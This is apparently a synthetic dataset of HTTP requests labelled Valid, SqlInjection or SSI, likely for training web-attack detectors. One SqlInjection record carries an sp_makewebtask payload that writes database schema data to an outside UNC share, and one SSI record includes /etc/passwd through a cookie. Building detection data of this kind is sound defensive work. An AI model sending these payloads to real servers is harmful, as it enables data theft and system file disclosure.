Via: 0.8 233.85.144.177
Warning: 639 110.21.4.33 "mwrreisntcmcs169in" 

null

End - Id: 40367
Start - Id: 14787
class: Valid
GET /s1hestpDousbrnhbe.tiff? HTTP/1.0
Host: 170.10.139.74
Connection: ldty
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.7, iso-2022-jp, koi8, windows-874;q=0.1
Accept-Encoding: gzip
Accept-Language: nuqshnyq-e;q=0.6, i-tod;q=0.3, crdmh-Esu1;q=0.3, hen5nA-plE2mb, a-oc;q=0.0
Cache-Control: only-if-cached
Client-ip: 104.98.203.85
Cookie: sidnhrrrrtusi=iui5;roEeli6DAd=1(;R6L_bEopt=%(geiamrqlibFeqtns=&;N6nph-.=722354;toartpnmvs2=827513
Cookie2: $Version="671"
Date: Sat, 24 May 08 04:54:01 CET
ETag: W/"_8gE6FhqB.1.hyLdc5U"
Expect: rpoat
From: nOeesl@pemet.it
If-Modified-Since: Thu, 04 Feb 10 14:04:09 GMT
If-Unmodified-Since: Wed, 05 Oct 05 11:27:35 CET
If-Match: "tbmAW32F47ebW5bn"
If-None-Match: "WY2PeiyIZEI3Pud"
If-Range: Thu, 19 Feb 04 04:45:47 UTC
Max-Forwards: 3077
MIME-Version: 1.7
Pragma: aswrrth='neyrajlj'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: NTLM NGVpZWpzdDZyckVkbHRpZ3R5bnVubnZlUG51aDh3aXRvaWFhZQ==
Range: -902734
Referer: /1mouMtne.txt
TE: trailers
Trailer: Transfer-Encoding
User-Agent: wsaEt/7.6.2
UA-CPU: Sparc
UA-Disp: 759,727,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1881x145
Via: 7.8 www.ibgn.jpg
Transfer-Encoding: identity
Upgrade: snemam/8.9, trd/0.2, ysb8i4/8.3, tiEie/9.8
Warning: 389 57.107.55.77 "ixtnuciisLc1" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 53821582673428600295
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14787
Start - Id: 12169
class: Valid
GET /tx5yk/rrIiSeKinsiohosir8/s8/nl.aUwm/ga/wsjUEs6z/r-Nwk/connectsI8@b1-BME29.css? HTTP/1.0
Host: www.tAms.ch
Connection: close
Accept: audio/*;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: lgqtkvt-laitsrsh;q=0.6, hoc-di;q=0.5
Cache-Control: ut=dshd
Client-ip: 103.226.92.182
Cookie: d68=aogsbWs93teo4i;ath3estEoNpset=631;6deoihe0thw=86482;tielTTrst3iahj=13721;oaredeetmoadds=eVhqd;tthrNdrctnrtnDa=aPmPoe nn5hr~i
Cookie2: $Version="2"
Date: Sat, 10 Sep 05 20:11:53 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: lusru=ihdmtn
From: eeotsLel@forahartri.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Thu, 24 Jun 04 14:30:27 CET
If-Match: "t5dlC4wLmdfAdkwC"
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 1.4
Pragma: ey3taii='4E'
Proxy-Authorization: lert mmeei=fdhn
Authorization: syualn atb5Dae=akwes
Range: 91-,-6,6-46
Referer: /bexea.pl
TE: trailers
Trailer: Host
User-Agent: em4laohEig
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: 7.1 199.40.158.115, ansee/2.9 109.89.142.205
Transfer-Encoding: deflate
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12169
Start - Id: 31142
class: Valid
GET /tgol71IdNR/rnG9qgp@7qc3/tu2/rtowoqnateo9Rpteutus/rK1j0-DDah9cJiM2Vw0t/lBduF.x/ehfr/aanlhdawtihg8enA/s.ZhiM-yK9ukTRiN0KXu/z1/t578ikPmSCX3JGen.gif?xfxvJapV=332&h87ruiagbntOe=td_&y32yV6YJi=+locationR0tmpaUnotmlew3&mmraehrtlcaePse=ns9e.2 HTTP/1.0
Host: www.hnnesstdti.fr
Connection: close
Accept: audio/x-wav;q=0.5, image/png
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: NN3slsao-fbl;q=0.2, zrn-ccua, neRme-ywouZz, oeNnwt-hjoeifnr, tclN-o;q=0.8
Cache-Control: max-age=98
Client-ip: 239.241.26.103
Cookie: r2eewavnynz=2391
Cookie2: $Version="96"
Date: Sat, 24 Jan 09 15:58:46 CET
ETag: W/"SElZ2btlWPrC_9kq"
Expect: iM7Nmr
From: dgsh@nuauoeihu3.be
If-Modified-Since: Thu, 02 Mar 06 17:12:31 UTC
If-Unmodified-Since: Tue, 05 Feb 08 20:45:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 03:24:07 CET
Max-Forwards: 25
MIME-Version: 0.2
Pragma: owtehht='otle'
Proxy-Authorization: Basic T2l1ZWhsOkVtTHYwdGV5
Authorization: Basic cGVFejVpcmw6ZW9veTA=
Range: 489-
Referer: http://ddd8I.uk/oHeeuis.mdb
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (Machintosh; U; Mac OS X 9.0; fy-to; rv:1.2.6) Gecko/54801897
UA-CPU: 68000
UA-Disp: 4975,930,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 006x0158
Via: 0.8 www.Ldloju8s.css, FTP/8.8 174.0.63.103, gs1/1.0 234.125.229.8
Transfer-Encoding: deflate
Upgrade: 2ro3rd/5.8
Warning: 406 www.aeUwu.shtml "s2n0a3tdlcheeb4euana" 
X-Forwarded-For: 129.20.120.4
X-Serial-Number: 16589272146
----: ---------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31142
Start - Id: 33289
class: Valid
POST /t9@9qHFeu-FJ6sIvGOA/itdiEJNAco5m4nil/i.P-/PIGA1ZUQb/hYNbgCo/l_K0xMCgLIZh3qE/hdiaiatnAmanlRseWlee/bc2Eu/sesfea.exe? HTTP/1.0
Content-Length: 268
Content-Language: ahe72l
Content-Encoding: deflate
Content-Location: /7trt/tMdaa/no0n/ri7t/strehq.doc
Content-MD5: MTNUZWRQZWVlZHNtWm82Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Dec 07 12:35:13 CET
Last-Modified: Thu, 07 May 09 08:01:53 GMT
Host: 53.115.57.225
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: loez='chZln8'
Client-ip: 229.124.95.212
Cookie: 5qIMsW=078916183;7l9ychild_astyleip=x=xml2h;hltmedn4rdma4=rpznb;etcoptPJ1jF=Tct% s-/P;ooRehtir3e=BirthcnT3Lu9;u4ebtifti=ciaxfDbes
Cookie2: $Version="4"
Date: Tue, 05 Sep 06 11:13:46 GMT
ETag: "QuxgVBAa3nWTlkjQ"
Expect: 100-continue
From: mAdt5d8u@p9ftocaEee.be
If-Modified-Since: Wed, 27 Sep 06 22:13:02 UTC
If-Unmodified-Since: Fri, 09 Jul 04 07:46:26 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Jan 07 19:42:05 GMT
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic VHJybWxlYmE6YWlocG8=
Range: 8584-634
Referer: /sg6gtro.pdf
TE: gzip,trailers,chunked;q=0.0
Trailer: Via
User-Agent: Mozilla/4.5 (X11; U; Solaris 8.6; ss-cz; rv:9.4.7) Gecko/37419493
UA-CPU: MIPS
UA-Disp: 088,074,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8624x050
Via: 9.1 138.158.7.130, 4.4 240.57.130.137:74359, HTTP/7.3 253.110.167.191:4
Transfer-Encoding: compress
Upgrade: olEewx/5.1
Warning: 216 98.195.83.109 "myymAJnoiocc" 
X-Forwarded-For: 239.161.3.196
X-Serial-Number: 411007
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oo5iTtUsee5=57&mdelralatn6G=nFr.fXRx&ekmagn=passwdhiToiopene admindocopyCRie&exsxolCmTrLi=3jnoe2IGnp&oeenhrsrficoa=aledred99&eo=n0NexmSs&nzSsexaiein=2&niAs2nigf=qC9PeLCadbHe&qvIddLE=44&nniiunan=catwh%o4rduyu script5var$bhns&agept5=pavya89rHe&utc=|ifst&uuth8r=591

End - Id: 33289
Start - Id: 16538
class: Valid
GET /XrDkMhzL-xIz/o29e5qBcE/bps0wr9a/f@62C1connectWIUyFAG/zg/ernhu/6-0rZIPaS@Unkb76XfXu/gso9a5er2/tann1lgsqi.js?NpasswdPtsock_streamGEE1body6Y=cvsjmoko&ycotd=4893064&wo5i8dieaNi=0382651&tnn2hddhtnroaa=i3oL2J%40O&p4ssqo=3278155230&eqsiKs=098070132 HTTP/1.1
Host: www.iihm1v5tf.biz:2
Connection: mmdwsitm
Accept: text/*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 80.111.89.60
Cookie: amomeutsvoior=131;fhai=sQF2IAT;tn=29696237;umn=30572370
Cookie2: $Version="6"
Date: Thu, 18 Jun 09 24:07:12 UTC
ETag: W/"zVnKeDH.VwKLyfrA"
Expect: 6otl
From: 76ee@Emufnodv.uk
If-Modified-Since: Sun, 20 Sep 09 19:10:38 CET
If-Unmodified-Since: Sat, 27 Mar 04 16:50:21 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Dec 04 17:47:02 UTC
Max-Forwards: 7671
MIME-Version: 3.7
Pragma: dOlep4o=noe
Proxy-Authorization: NTLM dHluaGlhcnVsc2FudWxBSWFEdWVlTHNyYWZtM3MyY2lSZWhvY2RobnI0bDFlbGl0
Authorization: NTLM YWVpOXV6c2VlSG56U2kwc3VyWmVhNWREdG9ybmFsdG92eXNtZWdyaGlzYVB0cnY=
Range: 53-224,9424-27
Referer: http://www.kOe8yr.de/netnem96/amch/s8pfzbs1/aRrosau/trudetp.cgi
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/5.1 (X11; U; Linux i586 2.5; tm-nU; rv:5.4.2) Gecko/46974339
UA-CPU: MIPS
UA-Disp: 439,238,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 599x133
Via: 7.0 www.leoW.png, FTP/5.1 89.57.110.165, 5.2 236.71.165.12
Transfer-Encoding: gzip
Upgrade: dst8ln/4.3, ctAuo/5.0
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 05592727151
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16538
Start - Id: 17108
class: Valid
GET /uN0adocumentbl2EB/dpl.pl?nr=9&LupdatezgmetacZ6pc1f=sePbUFyaBcqV&hmttr=4&fe0ewaezttaeath=Rmcot HTTP/1.1
Host: 229.85.71.140:80
Connection: hoae0nut
Accept: image/*;q=0.0
Accept-Charset: iso-8859-4, iso-8859-2;q=0.9
Accept-Encoding: 
Accept-Language: iviRohh-rckn4
Cache-Control: min-fresh=5428
Client-ip: 55.33.105.236
Cookie: ieWw=2co0riofnkw;AEodeaeh=dDt1mcntaSNneaknl;mhiah=2xB3YZ;ailcaoj=eseDgniaueRuEho;ssrotitcO0b=lrn;TWlNFR=550
Cookie2: $Version="7"
Date: Wed, 30 Aug 06 23:19:05 GMT
ETag: W/"bP5Ox600qbTCA@DWsP"
Expect: ebpsa=omltsd;y5ns9=sp1Eidj
From: rujdrFrL@e4s1eoon.net
If-Modified-Since: Wed, 29 Dec 04 23:06:43 CET
If-Unmodified-Since: Tue, 19 Jun 07 09:09:23 GMT
If-Match: *
If-None-Match: "r8gCrVQL3854auO8n"
If-Range: Wed, 01 Nov 06 08:17:31 CET
Max-Forwards: 7771
MIME-Version: 4.7
Pragma: 7dn=nst
Proxy-Authorization: NTLM NGdydGhxaGlFZnJlZW9ub2x1ZUNzc3dubnNvUmxuZnMybWg5aTN0cjZkaXQ=
Authorization: t7dto sO8d=miHtgg
Range: 0171-,862462-35
Referer: /ho7Hons/ic9oiCoa.jsp
TE: trailers,gzip;q=0.0
Trailer: Accept
User-Agent: ibne8thrydspNgii
UA-CPU: x86
UA-Disp: 553,514,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: 1.2 170.165.1.30, Apnro/2.4 46.215.149.109, 6.7 101.188.78.178
Transfer-Encoding: compress
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 816 www.eedo.htm "sdali2e4bw" 
X-Forwarded-For: 22.117.12.85
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17108
Start - Id: 41103
class: SqlInjection
GET /sS@cd/SadalanEb8/eVe@rjqVcVjL/fu0vuP/sW89xD_.bin?bu=neib&ifdroih=sk7ho&BviHx=exec+dm%5Bi&renitOe=%3D&fluT=aFLLW&pOth67et3a=7038488&Onullz9Nx1HAHLV=hpe&vUaRXSStelnet-HK-=60336&uddod=173364&ah8tYEinoejoopi=%27%3B++++EXEC+++++master..sp_makewebtask++++%22%5C%5C239.10.137.129%5Ch3o%5Cerv5tTot.gif%22%2C+++++%22SELECT++*+++++FROM+++++INFORMATION_SCHEMA.TABLES%22&eeeigoqies9cnee=71500 HTTP/1.0
Host: 80.245.24.168
Connection: close
Accept: video/quicktime;q=0.8
Accept-Charset: iso-2022-jp;q=0.8, x-mac-chinesesimp;q=0.7, iso-8859-2;q=0.2, iso-8859-8-i;q=0.3, windows-1254
Accept-Encoding: 
Accept-Language: nawe4ne-ph;q=0.0, ioeqh-lolen;q=0.1, des-rmtee;q=0.7
Cache-Control: max-stale=7132
Client-ip: 26.15.87.96
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Tue, 22 May 07 10:42:14 UTC
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Wed, 20 Jan 10 15:20:26 GMT
If-Match: "QyJJ3vQbiqtei8rvrPq"
If-None-Match: "aKihmhKJiNeeRiCI"
If-Range: *
Max-Forwards: 273
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: 4a1uo 4pt9hp=4broyo
Range: -397
Referer: /xnpefe.mp3
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: Mozilla/4.7 (Windows; U; Win98 6.7; s6-5d; rv:5.3.7) Gecko/64953817
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: 0.3 254.216.81.43
Transfer-Encoding: proa2
Upgrade: rsie/6.2, ped/8.7, tlgq/8.5, FsiO/2.3
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41103
Start - Id: 39522
class: SSI
GET /eb/taivmG/BL/o1xtOgvsugosniNqoa/ryhnO8/tLMRXHC.msf?7E7Zys20YX=+odisock_streamanrtrrttleh&t0msoainee8Oata=how4rn4Seara&taa2FiFxsetoi=95 HTTP/1.1
Host: www.1heauowit.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie: lif5hEaoEt=e5a-SNED;u6ceG=<!--  #include virtual="/etc/passwd"   -->
Cookie2: $Version="31"
Date: Sun, 06 Nov 05 01:57:44 UTC
ETag: "WUYadImtpEdLAIWZ"
Expect: 100-continue
From: eTedeI9@enhtetwr3.be
If-Modified-Since: Thu, 24 Dec 09 10:42:27 CET
If-Unmodified-Since: Sat, 03 Nov 07 18:02:24 UTC
If-Match: "O82rgYdRsz.zXwWOLRt"
If-None-Match: *
If-Range: Fri, 30 Dec 05 01:07:24 GMT
Max-Forwards: 572
MIME-Version: 8.9
Pragma: wfn='eF0'
Proxy-Authorization: Digest qop=ioTsdw3n
Authorization: NTLM ZmFpU3dpclRSaTU1YnNob290aHR0aGllb2J2b3d0dWN1cXN0TnRobg==
Range: 649-,-625813
Referer: http://www.alkemd.com/cjimrlos/dqkeav/tNit.tiff
TE: trailers,gzip
User-Agent: Mozilla/1.9 (X11; U; Linux i386 6.8; se-th; rv:0.6.2) Gecko/12874374
Via: t1pe/5.4 169.249.13.54, uhngn/2.3 62.129.155.213:70166, 1.3 www.eb9a.html
Transfer-Encoding: deflate
Warning: 371 169.121.60.122 "odtnnnle4TbLdinltnP" "Fri, 09 Jan 09 20:17:43 GMT"
X-Forwarded-For: 81.239.118.138
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39522
Start - Id: 10653
class: Valid
GET /fl/7oas0E3a2enet4t/itR/ep@LtyHDddr/9csSreqztiA6j4tqj/zo@b6Xbposition/opiAiatitodallhne6sz/rgr/3X9access_logqMi5825A2t/sps.msf?lriihG-p@=aQxAk&smE1lLsi2tghu=7770&tntio=yree&rSl=%24oT&5Rx9xvHYEPI=jFLnkBFU_v3&qNSRhU=fp9Q%40mZZ6uT&Ideardw=0729245 HTTP/1.1
Host: 66.125.50.45
Connection: ib95tao
Accept: text/html
Accept-Charset: x-mac-korean;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 182.244.88.200
Cookie: lIuzNsnzecr=pdestssvmsx0ecEena;fzailerU=tnce;oR9ixn8Yr7FN=datoo=ieizp;wsokNIbaaomis5=iIact9s7obgsound;iNbeadhrlwsdl=uoaai;mn5mIxkcevthe=lta+m
Cookie2: $Version="5"
Date: Fri, 22 Aug 08 23:17:17 CET
ETag: "mLXBIMmmBBpup.l"
Expect: IcnAn7
From: ahenthbe@eEs8aim.uk
If-Modified-Since: Sun, 06 Jul 08 18:21:07 CET
If-Unmodified-Since: Thu, 24 Jun 04 01:09:37 GMT
If-Match: *
If-None-Match: "oVMLs4ECbTi96Tkdh"
If-Range: Thu, 02 Dec 04 12:08:05 UTC
Max-Forwards: 658
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic aXRlZWlhcjo5c2gw
Authorization: m3ar sllt2h6a=hr5in
Range: 6-0447,7686-38299,7705-
Referer: http://www.ejoeeai0.com/wfltuhd/tmae.php4
TE: deflate
Trailer: Via
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 8.0; wn-e9; rv:7.3.7) Gecko/09526962
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4110x0979
Via: ozt/3.9 189.82.19.197:32, 6.0 78.42.51.223
Transfer-Encoding: identity
Upgrade: iies/1.4, toa/8.5, ngt/5.5, srge/2.7, 4nrmw3/1.3
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10653
Start - Id: 4285
class: Valid
PUT /4liqtrhlc8/pEry8zHZES/Ey4iwmtfscsSr/7iaSenoy1/Y3aQC18Jg-/4Ou3AhlbV3XmiC.tiff? HTTP/1.1
Content-Length: 204
Content-Language: sij
Content-Encoding: gzip
Content-Location: /6lojeca4/otem/eMniW/sdOepvs/hjtTeQ4h.pdf
Content-MD5: SXh0TjRpYkZuNGw3cnZleA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 14:28:29 CET
Last-Modified: Sat, 07 Apr 07 14:57:39 CET
Host: www.ls7cAWgcen.be
Connection: close
Accept: application/x-tar, audio/*
Accept-Charset: iso-8859-7, iso-8859-5, iso-8859-1;q=0.4, x-mac-greek;q=0.3, iso-8859-8
Accept-Encoding: compress;q=0.4, gzip;q=0.7, deflate
Accept-Language: 6A-d;q=0.9
Cache-Control: no-cache
Client-ip: 214.181.125.246
Cookie: wlK=u;elAlwh=tan
Cookie2: $Version="95"
Date: Thu, 22 Dec 05 17:43:42 UTC
ETag: "Uv7Qocx@cE_rEtGAi5ZY"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Thu, 09 Nov 06 21:37:40 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: "w4si0tliVRcGnXUX"
If-None-Match: "OTI3j2A8JnPQT9KG"
If-Range: Wed, 30 Apr 08 15:32:17 GMT
Max-Forwards: 554
MIME-Version: 1.5
Pragma: z='mn'
Proxy-Authorization: Basic dGRsbmM6b2xneWNp
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: /ttia/tsHb/sssegee/ohf9teE/3pptetm.cfm
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 5.2; ae-nl; rv:9.1.5) Gecko/91895651
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 536x588
Via: 4.2 www.sthhf3.htm
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 41906
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bnE=i l&sork4k=er2&&O23sock_stream_AMVQt=nbybaei&jfIPOsqcatU=3143888&ludnesar4aNutom=Etuim &eg9s8h=r-OW-38nOW&Uv2Yt-So0Sns=iz&soef=h&xfhopyo5i=916483&esoon=6696568&VinsertsThttps=aos&ttc0thf1utoo=r;li

End - Id: 4285
Start - Id: 22007
class: Valid
GET /srdelpdptniids7itaa/i_Dt8oPt4vuYq6IpzU/e_Fm1cBWmailNUL.html? HTTP/1.1
Host: 177.244.65.83
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=006
Client-ip: 166.123.70.154
Cookie: tv7Hocehi=rotmp2iezlicatd2E i[Hinull
Cookie2: $Version="91"
Date: Thu, 25 Jan 07 04:25:26 CET
ETag: W/"y@a9fTus_RQlTN96"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 04 Sep 07 19:54:46 UTC
If-Unmodified-Since: Sun, 09 Nov 08 13:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic b2ROb2V2Om9sYTc=
Authorization: NTLM YWVha2VoZXllYWljMGx5aG5oc2hybmU4Ynl0c2V0YnJvc0xKbGVvbmE=
Range: 048-5458,87200-
Referer: http://Odtrs0.it/teohtsat/Oiix9rb/zQiR.jsp
TE: gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/3.0 (Windows; U; Win98 4.0; pn-od; rv:2.5.6) Gecko/67566561
UA-CPU: Sparc
UA-Disp: 514,290,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3071x562
Via: FTP/5.1 www.xlhan.js
Transfer-Encoding: deflate
Upgrade: pufgp/8.1, Wcil/8.8
Warning: 409 www.rklthno.jpeg "2gidteht4e3rseoOd" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 920022590702
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22007
Start - Id: 692
class: Valid
GET /adx95ocXx/2f/atnmazwnmlc.js?ovulfyyl=%3Bsystem+ssnbee6ere%5B%3Ein+%26m&ooauruteehli=9EwDyeAI4602&KCXdXidWIC=efs+d&dd7htutdodh=epuM&A49wexecHCl7If=%40sasfyfOqhfzWl&hritdetaemfrrg=3rner7mho6g HTTP/1.0
Host: www.otlbuhfh7b.it
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 80.195.233.91
Cookie: connectLn3hNXP=nJhWmT4sLhcK
Cookie2: $Version="243"
Date: Tue, 10 Feb 09 23:32:47 UTC
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Fri, 20 Aug 04 21:30:48 CET
If-Unmodified-Since: Mon, 20 Mar 06 17:19:37 CET
If-Match: *
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 78
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="hihtp"
Authorization: NTLM cjU5YWVvdmlvc2FFZmFkb25ld2FheHBqbjFlbGRhYWxjYmJ5cg==
Range: -2,294564-,00-
Referer: http://evnye8d3.it/eymup.jsp
TE: deflate,gzip;q=0.2
Trailer: Transfer-Encoding
User-Agent: ac305tSx (2vblJGoyd; 9.Cor2Q)
UA-CPU: x86
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: HTTP/1.2 www.edode2NN.shtml
Transfer-Encoding: deflate
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 395 119.100.16.106 "T0trozfto" "Fri, 08 May 09 24:52:53 GMT"
X-Forwarded-For: 26.52.16.97
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 692
Start - Id: 16817
class: Valid
GET /nthbeNi/4m1tl8whaien1frhleta/e_aEk46@YdXVVupnG/e2rfao/sZeuKXZ8ZhtW/it@4FJLRBFea/XH/4f5eamb6lhvjeai5we/cevdsvci.html?Y8ei4ate0=hinVehS3ae&e7eudtcierwUri=ncU+&I1EbB4%uS=eTTS&X_aWUCvUGf=1&oAroxwnelt=%5Cmal&oEscit=rRkwhjE0GUx&-G_ZF=8714&nis7et=39384&iur7geu0tn=ltn&3xrdhhGid=aBkq.cJ&aemhrrenth=ronull&trxtwmuktzid0eg=66684&AT.F-tgiOnetcat=%40citemh%29so5+2%3D3it&ta=kselectmgtro+e%40hyuu&otnweBed6nactoa=ghaving%26haconnectEqere HTTP/1.0
Host: www.4attRrnl.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cYeh-tern5oxf, B-tabur6, ohUf9-7iDeqm, lidI-lfo, dtn1-nhncee;q=0.8
Cache-Control: max-stale=69289
Client-ip: 219.189.119.78
Cookie: gtU=5960173;2mregd=CmuaEwnrsofBo;AvErnwf=cvKg13;.rrmYgwM=a;tD4LcX=0
Cookie2: $Version="584"
Date: Thu, 08 May 08 23:39:45 CET
ETag: W/"eQWZ_HrJrrbOJgYZ"
Expect: 100-continue
From: eoPu@ohbrao.biz
If-Modified-Since: Thu, 10 Feb 05 03:58:51 CET
If-Unmodified-Since: Sat, 23 Dec 06 22:03:56 GMT
If-Match: "d-BVB@mSVF5K-xk"
If-None-Match: "tkv6VCSYzf-wcsYbF"
If-Range: Sun, 10 Sep 06 18:13:48 GMT
Max-Forwards: 23
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: NTLM ZW5vbERvb2VwNWVpYWlsaW5kaXJ3Z3VjbGVjYWlvaXBlbGhlOQ==
Range: -24853
Referer: http://www.Xmhlh.com/o2or/gjty/hcytnr/udib.wav
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: kanto (rm@oax)
UA-CPU: MIPS
UA-Disp: 952,004,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 916x0533
Via: 4.1 76.125.89.183, dcuui/5.0 237.242.224.131
Transfer-Encoding: identity
Upgrade: ehb/5.0, ddtr/2.0, tCi/5.5, Scstne/5.2, totwta/1.3
Warning: 241 226.111.88.138 "blstama" "Mon, 10 Jan 05 20:15:12 UTC"
X-Forwarded-For: 129.22.211.92
X-Serial-Number: 60090044663
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16817
Start - Id: 20756
class: Valid
GET /d6TDtvJLEhXpe8MxrKx/linkincludeiq@.bin6_e/mn/eewyzsrei6/sosaory/6btaxed/rL3dMofS7Ng9/l-vOvR_Pz/toiayh-l9qfpgP5tL3u/thniEeaa/swpntrr98aate.js?dRst=866208516&pzocbhe=efiTT&2deotmc=8%3Cb%29yls+o&spibih=5LhSqhome8%2Fd0de-&gn3re=rxou2rlgqnmna&kEfLdrt=794002 HTTP/1.1
Host: 204.160.157.214
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-ce;q=0.1, iso-8859-1, gb2312, cp-932, x-mac-roman;q=0.6
Accept-Encoding: compress;q=0.7, identity, compress;q=0.5, gzip;q=0.0, deflate;q=0.7
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
